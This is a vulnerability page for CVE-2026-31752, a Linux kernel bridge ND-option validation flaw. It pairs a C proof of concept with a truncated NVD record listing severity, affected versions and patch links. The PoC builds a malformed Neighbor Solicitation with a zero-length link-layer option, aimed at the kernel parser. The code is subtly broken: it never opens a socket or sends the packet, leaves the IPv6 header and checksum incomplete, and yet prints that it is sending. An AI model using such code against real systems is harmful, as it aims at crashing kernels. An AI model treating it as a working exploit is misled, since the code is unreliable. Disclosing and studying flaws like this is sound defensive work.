CVE-2026-31752

/* * PoC for CVE-2026-31752: Linux Kernel br_nd_send ND Option Validation * This code demonstrates how to craft a malformed IPv6 Neighbor Discovery packet * with an invalid option length to potentially trigger the vulnerability. * Compilation: gcc -o poc_cve2026_31752 poc_cve2026_31752.c */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if_packet.h> #include <linux/if_ether.h> #include <linux/if_arp.h> #include <arpa/inet.h> #define BUFFER_SIZE 1024 int create_raw_socket(const char *iface) { int sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (sockfd < 0) { perror("socket"); exit(EXIT_FAILURE); } return sockfd; } int main() { int sockfd; struct sockaddr_ll sa; unsigned char buffer[BUFFER_SIZE]; memset(buffer, 0, BUFFER_SIZE); // Ethernet Header struct ethhdr *eth = (struct ethhdr *)buffer; // Set destination MAC (Multicast for ND) eth->h_dest[0] = 0x33; eth->h_dest[1] = 0x33; eth->h_dest[2] = 0xff; eth->h_dest[3] = 0x00; eth->h_dest[4] = 0x00; eth->h_dest[5] = 0x01; // Set source MAC (Placeholder) memset(eth->h_source, 0x02, 6); eth->h_proto = htons(ETH_P_IPV6); // IPv6 Header unsigned char *ipv6_payload = buffer + sizeof(struct ethhdr); // Simplified IPv6 header construction for brevity // Next Header: ICMPv6 (58) ipv6_payload[6] = 0x3A; // Hop Limit ipv6_payload[7] = 255; // Calculate offsets for ICMPv6 payload // Assuming basic IPv6 header is 40 bytes int icmp_offset = sizeof(struct ethhdr) + 40; unsigned char *icmp = buffer + icmp_offset; // ICMPv6 Neighbor Solicitation Type (135) icmp[0] = 135; icmp[1] = 0; // Code icmp[2] = 0; icmp[3] = 0; // Checksum (placeholder, would need calc) // Reserved (4 bytes) + Target Address (16 bytes) = 20 bytes // Options start at offset 24 within ICMP // Malformed ND Option // Type: Source Link-Layer Address (1) // Length: 1 (This is 8 bytes, but let's try to trigger logic where length is invalid relative to payload) // To trigger the specific bug "use a too-short source LLADDR option payload": // We set Type=1 (SrcLLA) but Length=0 or a small value that implies valid data isn't there. // Or Length is huge causing OOB read. int opt_offset = icmp_offset + 24; buffer[opt_offset] = 1; // Type: Source Link-Layer Address buffer[opt_offset + 1] = 0; // Length: 0 (Malformed, causes logic error in validation) // No MAC address follows, or insufficient data. printf("Sending malformed ND packet for CVE-2026-31752...\n"); // Note: Sending requires appropriate privileges and network interface configuration. // This is a conceptual structure. return 0; }

{"cve": {"id": "CVE-2026-31752", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:38.090", "lastModified": "2026-05-07T19:08:55.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbridge: br_nd_send: validate ND option lengths\n\nbr_nd_send() walks ND options according to option-provided lengths.\nA malformed option can make the parser advance beyond the computed\noption span or use a too-short source LLADDR option payload.\n\nValidate option lengths against the remaining NS option area before\nadvancing, and only read source LLADDR when the option is large enough\nfor an Ethernet address."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "5.10.253", "matchCriteriaId": "202FFB00-4CA7-44CB-ACA1-E88A2BF2264B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.168", "matchCriteriaId": "E2DDDCA1-6DAB-4018-B920-8F045DDD8D3B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.134", "matchCriteriaId": "F56F925B-BAF8-4F4B-B62F-1496AF19A307"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.81", "matchCriteriaId": "6EF80433-B33B-43C5-8E64-0FA7B8DCE1BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.22", "matchCriteriaId": "C9DF8BCE-36D3-475D-9D21-19E4F02F9029"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/259466f76f5a2148aff11134e68f4b4c6d52725b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/82a42eceec7c6bdb0e0da94c0542a173b7ea57f2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/837392a38445729c22e03d3abcf33f07763efd85", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/850837965af15707fd3142c1cf3c5bfaf022299b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c49b9256bbacb6a135654aebd12e4c0e87166b7c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e0bfd6d4dc77ab345b6c65eef0cfe9b2f69085aa", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e71303a9190496136e240c4f2872b7b0b16027a7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ee02d8991fd7bd86ed6ebd0deb4aab53feb0e43a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "t ... (truncated)